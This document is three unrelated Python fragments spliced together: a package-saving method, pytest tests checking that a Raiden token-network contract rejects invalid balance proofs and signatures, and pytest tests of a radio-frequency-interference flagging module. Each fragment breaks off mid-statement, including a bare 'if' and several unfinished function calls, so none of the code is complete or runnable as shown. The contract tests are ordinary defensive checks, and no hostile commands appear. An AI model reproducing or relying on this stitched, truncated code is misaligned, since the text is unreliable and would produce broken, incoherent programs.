def savePackageToFile(self, filename, suffix=Package.DEFAULT_EXT):
try:
if self.package is None:
self.package = Package(None, self._stopMessage, mode="w")
self._writePackageToFile(filename, suffix)
except DataError as details:
self.logger.printL(1,"Problem writing package.\n%s" % details, "dw_error", "DW")
self._stopMessage()
raise
except IOError as arg:
self.logger.printL(1,"Cannot open file for package %s" % filename, "dw_error", "DW")
self._stopMessage()
raise
except Exception:
self.logger.printL(1,"Unexpected error while writing package!\n%s" % sys.exc_info()[1], "dw_error", "DW")
self._stopMessage()
raise
## The saving function
def _writePackageToFile(self, filename, suffix=Package.DEFAULT_EXT):
"""Saves all information to a new file"""
if | |
from collections import namedtuple
import pytest
from eth_tester.exceptions import TransactionFailed
from raiden_contracts.constants import (
EVENT_CHANNEL_BALANCE_PROOF_UPDATED,
CHANNEL_STATE_OPENED,
CHANNEL_STATE_NONEXISTENT,
TEST_SETTLE_TIMEOUT_MIN,
)
from raiden_contracts.utils.events import check_transfer_updated
from .fixtures.config import fake_bytes, EMPTY_ADDRESS
def test_update_call(
get_accounts,
token_network,
create_channel,
channel_deposit,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(A, 15, B)
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
(balance_hash, nonce, additional_hash, closing_signature) = balance_proof_A
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
EMPTY_ADDRESS,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
EMPTY_ADDRESS,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
fake_bytes(64),
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
fake_bytes(32),
nonce,
additional_hash,
closing_signature,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_hash,
0,
additional_hash,
closing_signature,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_hash,
nonce,
additional_hash,
fake_bytes(64),
balance_proof_update_signature_B,
).transact({'from': C})
def test_update_nonexistent_fail(
get_accounts,
token_network,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
(_, settle_block_number, state) = token_network.functions.getChannelInfo(A, B).call()
assert settle_block_number == 0
assert state == CHANNEL_STATE_NONEXISTENT
channel_identifier = token_network.functions.getChannelIdentifier(A, B).call()
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
def test_update_notclosed_fail(
get_accounts,
token_network,
create_channel,
channel_deposit,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(A, 25, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
(_, settle_block_number, state) = token_network.functions.getChannelInfo(A, B).call()
assert settle_block_number > 0
assert state == CHANNEL_STATE_OPENED
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': C})
def test_update_wrong_nonce_fail(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
updateBalanceProof_state_tests,
):
(A, B, Delegate) = get_accounts(3)
settle_timeout = 6
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_B = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
txn_hash1 = token_network.functions.closeChannel(B, *balance_proof_B).transact({'from': A})
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': Delegate})
balance_proof_A_same_nonce = balance_proof_A
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A_same_nonce,
balance_proof_update_signature_B,
).transact({'from': Delegate})
balance_proof_A_lower_nonce = create_balance_proof(
channel_identifier,
A,
10,
0,
4,
fake_bytes(32, '02'),
)
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A_lower_nonce,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A_lower_nonce,
balance_proof_update_signature_B,
).transact({'from': A})
updateBalanceProof_state_tests(
A, balance_proof_A,
B, balance_proof_B,
settle_timeout,
txn_hash1,
)
def test_update_wrong_signatures(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
channel_identifier = create_channel(A, B)[0]
channel_deposit(A, 25, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_A_fake = create_balance_proof(
channel_identifier,
A,
10,
0,
5,
fake_bytes(32, '02'),
signer=C,
)
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
balance_proof_update_signature_B_fake = create_balance_proof_update_signature(
C,
channel_identifier,
*balance_proof_A,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A_fake,
balance_proof_update_signature_B,
).transact({'from': C})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B_fake,
).transact({'from': C})
def test_update_channel_state(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
updateBalanceProof_state_tests,
):
(A, B, Delegate) = get_accounts(3)
settle_timeout = 6
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_B = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
txn_hash1 = token_network.functions.closeChannel(B, *balance_proof_B).transact({'from': A})
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': Delegate})
updateBalanceProof_state_tests(
A, balance_proof_A,
B, balance_proof_B,
settle_timeout,
txn_hash1,
)
def test_update_channel_fail_no_offchain_transfers(
get_accounts,
token_network,
create_channel,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B) = get_accounts(2)
channel_identifier = create_channel(A, B)[0]
balance_proof_A = create_balance_proof(channel_identifier, A, 0, 0, 0)
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
fake_bytes(64),
).transact({'from': B})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': B})
def test_update_not_allowed_after_settlement_period(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
web3,
):
""" updateNonClosingBalanceProof cannot be called after the settlement period. """
(A, B) = get_accounts(2)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof_A = create_balance_proof(channel_identifier, A, 10, 0, 5, fake_bytes(32, '02'))
balance_proof_B = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_A,
)
token_network.functions.closeChannel(B, *balance_proof_B).transact({'from': A})
web3.testing.mine(settle_timeout)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_A,
balance_proof_update_signature_B,
).transact({'from': A})
def test_update_not_allowed_for_the_closing_address(
token_network,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
""" Closing address cannot call updateNonClosingBalanceProof. """
(A, B, M) = get_accounts(3)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
# Some balance proof from B
balance_proof_B_0 = create_balance_proof(channel_identifier, B, 5, 0, 3, fake_bytes(32, '02'))
# Later balance proof, higher transferred amount, higher nonce
balance_proof_B_1 = create_balance_proof(channel_identifier, B, 10, 0, 4, fake_bytes(32, '02'))
# B's signature on the update message is valid
balance_proof_update_signature_B = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_B_1,
)
# A closes with the first balance proof
token_network.functions.closeChannel(B, *balance_proof_B_0).transact({'from': A})
# Someone wants to update with later balance proof - not possible
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_B_1,
balance_proof_update_signature_B,
).transact({'from': A})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_B_1,
balance_proof_update_signature_B,
).transact({'from': B})
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_B_1,
balance_proof_update_signature_B,
).transact({'from': M})
def test_updateNonClosingBalanceProof_invalid_BP_arguments(
token_network,
token_network_test,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
(A, B, C) = get_accounts(3)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
balance_proof = namedtuple(
'balance_proof',
['balance_hash', 'nonce', 'additional_hash', 'signature'],
)
# Create valid balance_proof
balance_proof_valid = balance_proof(*create_balance_proof(
channel_identifier,
A,
10,
0,
2,
fake_bytes(32, '02'),
))
# And a valid nonclosing_signature
valid_balance_proof_update_signature = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_valid,
)
# We test invalid balance proof arguments with valid signatures
# Create balance_proof for invalid token_network
balance_proof_invalid_token_network = balance_proof(*create_balance_proof(
channel_identifier,
A,
10,
0,
2,
fake_bytes(32, '02'),
other_token_network=token_network_test,
))
signature_invalid_token_network = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
other_token_network=token_network_test,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_invalid_token_network,
signature_invalid_token_network,
).transact({'from': B})
# Create balance_proof for invalid channel participant
balance_proof_invalid_channel_participant = balance_proof(*create_balance_proof(
channel_identifier,
C,
10,
0,
2,
fake_bytes(32, '02'),
))
signature_invalid_channel_participant = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_invalid_channel_participant,
signature_invalid_channel_participant,
).transact({'from': B})
# Create balance_proof for invalid channel identifier
balance_proof_invalid_channel_identifier = balance_proof(*create_balance_proof(
channel_identifier[::-1],
A,
10,
0,
2,
fake_bytes(32, '02'),
))
signature_invalid_channel_identifier = create_balance_proof_update_signature(
B,
channel_identifier[::-1],
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_invalid_channel_identifier,
signature_invalid_channel_identifier,
).transact({'from': B})
signature_invalid_balance_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash[::-1],
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash[::-1], # invalid balance_hash
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
signature_invalid_balance_hash,
).transact({'from': B})
signature_invalid_nonce = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
1,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash,
1, # invalid nonce
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
signature_invalid_nonce,
).transact({'from': B})
signature_invalid_additional_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash[::-1],
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
fake_bytes(32, '02'), # invalid additional_hash
balance_proof_valid.signature,
signature_invalid_additional_hash,
).transact({'from': B})
signature_invalid_closing_signature = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature[::-1],
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
signature_invalid_closing_signature[::-1], # invalid non-closing signature
).transact({'from': B})
# Call with same balance_proof and signature on valid arguments still works
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
valid_balance_proof_update_signature,
).transact({'from': B})
def test_updateNonClosingBalanceProof_signature_on_invalid_arguments(
token_network,
token_network_test,
create_channel,
channel_deposit,
get_accounts,
create_balance_proof,
create_balance_proof_update_signature,
):
""" Call updateNonClosingBalanceProof with signature on invalid argument fails. """
(A, B, C) = get_accounts(3)
settle_timeout = TEST_SETTLE_TIMEOUT_MIN
deposit_A = 20
channel_identifier = create_channel(A, B, settle_timeout)[0]
channel_deposit(A, deposit_A, B)
balance_proof = namedtuple(
'balance_proof',
['balance_hash', 'nonce', 'additional_hash', 'signature'],
)
# Close channel
token_network.functions.closeChannel(
B,
fake_bytes(32),
0,
fake_bytes(32),
fake_bytes(64),
).transact({'from': A})
# Create valid balance_proof
balance_proof_valid = balance_proof(*create_balance_proof(
channel_identifier,
A,
10,
0,
2,
fake_bytes(32, '02'),
fake_bytes(32, '02'),
))
signature_invalid_token_network_address = create_balance_proof_update_signature(
B,
channel_identifier,
*balance_proof_valid,
other_token_network=token_network_test, # invalid token_network_address
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_token_network_address,
).transact({'from': B})
signature_invalid_participant = create_balance_proof_update_signature(
C, # invalid signer
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_participant,
).transact({'from': B})
signature_invalid_channel_identifier = create_balance_proof_update_signature(
B,
channel_identifier[::-1], # invalid channel_identifier
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_channel_identifier,
).transact({'from': B})
signature_invalid_balance_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash[::-1], # invalid balance_hash
balance_proof_valid.nonce,
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_balance_hash,
).transact({'from': B})
signature_invalid_nonce = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
1, # invalid nonce
balance_proof_valid.additional_hash,
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
signature_invalid_nonce,
).transact({'from': B})
signature_invalid_additional_hash = create_balance_proof_update_signature(
B,
channel_identifier,
balance_proof_valid.balance_hash,
balance_proof_valid.nonce,
b'\x00' * 32, # invalid additional_hash
balance_proof_valid.signature,
)
with pytest.raises(TransactionFailed):
token_network.functions.updateNonClosingBalanceProof(
A,
B,
*balance_proof_valid,
| |
"""Tests of the xrfi module."""
import pytest
import itertools
import numpy as np
import yaml
from pathlib import Path
from pytest_cases import fixture_ref as fxref
from pytest_cases import parametrize
from edges_cal import xrfi
NFREQ = 1000
@pytest.fixture(scope="module")
def freq():
"""Default frequencies."""
return np.linspace(50, 150, NFREQ)
@pytest.fixture(scope="module")
def sky_pl_1d(freq):
return 1750 * (freq / 75.0) ** -2.55
@pytest.fixture(scope="module")
def sky_flat_1d():
return np.ones(NFREQ)
@pytest.fixture(scope="module")
def sky_linpoly_1d(freq):
p = np.poly1d([1750, 0, 3, -2, 7, 5][::-1])
f = np.linspace(-1, 1, len(freq))
return (freq / 75.0) ** -2.55 * p(f)
def thermal_noise(spec, scale=1, seed=None):
if seed:
np.random.seed(seed)
return np.random.normal(0, spec / scale)
@pytest.fixture(scope="module")
def rfi_regular_1d():
a = np.zeros(NFREQ)
a[50::50] = 1
return a
@pytest.fixture(scope="module")
def rfi_regular_leaky():
"""RFI that leaks into neighbouring bins"""
a = np.zeros(NFREQ)
a[50:-30:50] = 1
a[49:-30:50] = (
1.0 / 1000
) # needs to be smaller than 200 or else it will be flagged outright.
a[51:-30:50] = 1.0 / 1000
return a
@pytest.fixture(scope="module")
def rfi_random_1d():
a = np.zeros(NFREQ)
np.random.seed(12345)
a[np.random.randint(0, len(a), 40)] = 1
return a
@pytest.fixture(scope="module")
def rfi_null_1d():
return np.zeros(NFREQ)
def print_wrongness(wrong, std, info, noise, true_flags, sky, rfi):
if len(wrong) > 0:
print("Indices of WRONG flags:")
print(100 + wrong)
print("RFI false positive(0)/negative(1): ")
print(true_flags[wrong])
print("Corrupted sky at wrong flags: ")
print(sky[wrong])
print("Std. dev away from model at wrong flags: ")
print((sky[wrong] - sky[wrong]) / std[wrong])
print("Std. dev of noise away from model at wrong flags: ")
print(noise[wrong] / std[wrong])
print("Std dev of RFI away from model at wrong flags: ")
print(rfi[wrong] / std[wrong])
print("Measured Std Dev: ")
print(min(info.stds[-1]), max(info.stds[-1]))
print("Actual Std Dev (for uniform):", np.std(noise))
class TestFlaggedFilter:
def test_flagged_filter(self, sky_pl_1d, rfi_regular_1d):
flags = rfi_regular_1d.astype("bool")
in_data = sky_pl_1d.copy()
detrended = xrfi.flagged_filter(
in_data, size=5, flags=flags, interp_flagged=False
)
assert not np.any(np.isnan(detrended))
assert np.all(in_data == sky_pl_1d)
# Anything close to a flag will not be identical, as the
# median of an even number of items is the average of the middle two (and with
# a flag the total number of items is reduced by one).
assert np.all(detrended[flags] == sky_pl_1d[flags])
padded_flags = np.zeros_like(flags)
for index in np.where(flags)[0]:
padded_flags[index - 2 : index + 3] = True
padded_flags[index] = False
# Ensure everything away from flags is exactly the same.
assert np.all(detrended[~padded_flags] == sky_pl_1d[~padded_flags])
# An unflagged filter should be an identity operation.
unflagged = xrfi.flagged_filter(in_data, size=5)
assert np.all(unflagged == sky_pl_1d)
# But not quite, when mode = 'reflect':
unflagged = xrfi.flagged_filter(in_data, size=5, mode="reflect")
assert not np.all(unflagged[:2] == sky_pl_1d[:2])
# An unflagged filter with RFI should be very close to the original
sky = sky_pl_1d + 100000 * rfi_regular_1d
detrended = xrfi.flagged_filter(sky, size=5)
assert np.allclose(detrended, sky_pl_1d, rtol=1e-1)
class TestMedfilt:
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize(
"scale",
list(
itertools.product((1000, 100))
), # Note that realistic noise should be ~250.
)
def test_1d_medfilt(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, significance = xrfi.xrfi_medfilt(
sky, max_iter=1, threshold=10, kf=5, use_meanfilt=True
)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, {}, noise, true_flags, sky, rfi)
assert len(wrong) == 0
class TestXRFIModel:
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model(self, sky_model, rfi_model, scale, freq):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(sky, freq=freq)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize("rfi_model", [fxref(rfi_regular_leaky)])
@pytest.mark.parametrize("scale", [1000, 100])
def test_watershed_strict(self, sky_model, rfi_model, scale, freq):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale, rfi_amp=200)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(
sky, freq=freq, watershed=1, threshold=5, min_threshold=4, max_iter=10
)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize("rfi_model", [fxref(rfi_regular_leaky)])
@pytest.mark.parametrize("scale", [1000, 100])
def test_watershed_relaxed(self, sky_model, rfi_model, scale, freq):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale, rfi_amp=500)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(sky, freq=freq, watershed=1, threshold=6)
# here we just assert no *missed* RFI
wrong = np.where(true_flags & ~flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_init_flags(self, sky_pl_1d, rfi_null_1d, freq):
# ensure init flags don't propagate through
flags, info = xrfi.xrfi_model(sky_pl_1d, freq=freq, init_flags=(90, 100))
assert not np.any(flags)
@parametrize("rfi_model", [fxref(rfi_random_1d), fxref(rfi_regular_1d)])
@pytest.mark.parametrize("std_estimator", ["medfilt", "std", "mad", "sliding_rms"])
def test_std_estimator(self, sky_flat_1d, rfi_model, std_estimator, freq):
if std_estimator == "sliding_rms" and rfi_model[50] == 0:
pytest.skip("sliding_rms doesn't work well for unrealistic random RFI")
sky, std, noise, rfi = make_sky(sky_flat_1d, rfi_model, scale=1000)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model(sky, freq=freq, std_estimator=std_estimator)
wrong = np.where(true_flags != flags)[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_bad_std_estimator(self, sky_flat_1d, rfi_random_1d, freq):
sky, std, noise, rfi = make_sky(sky_flat_1d, rfi_random_1d, scale=1000)
with pytest.raises(ValueError):
flags, info = xrfi.xrfi_model(sky, freq=freq, std_estimator="bad_estimator")
class TestWatershed:
def test_watershed(self):
rfi = np.zeros((10, 10), dtype=bool)
out, _ = xrfi.xrfi_watershed(flags=rfi)
assert not np.any(out)
rfi = np.ones((10, 10), dtype=bool)
out, _ = xrfi.xrfi_watershed(flags=rfi)
assert np.all(out)
rfi = np.repeat([0, 1], 48).reshape((3, 32))
out, _ = xrfi.xrfi_watershed(flags=rfi, tol=0.2)
assert np.all(out)
def test_pass_weights(self):
out, _ = xrfi.xrfi_watershed(weights=np.zeros((10, 10)))
assert np.all(out)
def test_pass_no_flags(self):
with pytest.raises(ValueError):
xrfi.xrfi_watershed()
class TestModelSweep:
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky,
max_iter=10,
threshold=5,
use_median=True,
which_bin="last",
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] != flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep_all(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky, max_iter=10, which_bin="all", threshold=5, use_median=True
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] != flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
@parametrize(
"sky_model", [fxref(sky_flat_1d), fxref(sky_pl_1d), fxref(sky_linpoly_1d)]
)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep_watershed(self, sky_model, rfi_model, scale):
sky, std, noise, rfi = make_sky(sky_model, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
sky, max_iter=10, which_bin="all", threshold=5, use_median=True, watershed=3
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] & ~flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_too_many_flags(self):
spec = np.ones(500)
flags = np.ones(500, dtype=bool)
weights = np.zeros(500)
# We're testing where not *all* are flagged, just enough to be more than the
# number of terms...
flags[::100] = False
weights[::100] = 1
flags_, info = xrfi.xrfi_model_sweep(spectrum=np.where(flags, np.nan, spec))
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, flags=flags)
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, weights=weights)
assert np.all(flags_)
assert not info
def test_all_flagged(self):
spec = np.ones(500)
flags = np.ones(500, dtype=bool)
weights = np.zeros(500)
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, flags=flags)
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec, weights=weights)
assert np.all(flags_)
assert not info
flags_, info = xrfi.xrfi_model_sweep(spectrum=spec * np.nan)
assert np.all(flags_)
assert not info
def test_no_data_error(self):
# to raise no data error, there must be no data for a whole window
spec = np.ones(500)
spec[50:150] = np.nan
flags, info = xrfi.xrfi_model_sweep(spec)
assert flags.shape == (500,)
@parametrize(
"rfi_model", [fxref(rfi_null_1d), fxref(rfi_regular_1d), fxref(rfi_random_1d)]
)
@pytest.mark.parametrize("scale", [1000, 100])
def test_xrfi_model_sweep_median(self, sky_flat_1d, rfi_model, scale):
rfi = rfi_model.copy()
rfi[:100] = 0
sky, std, noise, rfi = make_sky(sky_flat_1d, rfi_model, scale)
true_flags = rfi_model > 0
flags, info = xrfi.xrfi_model_sweep(
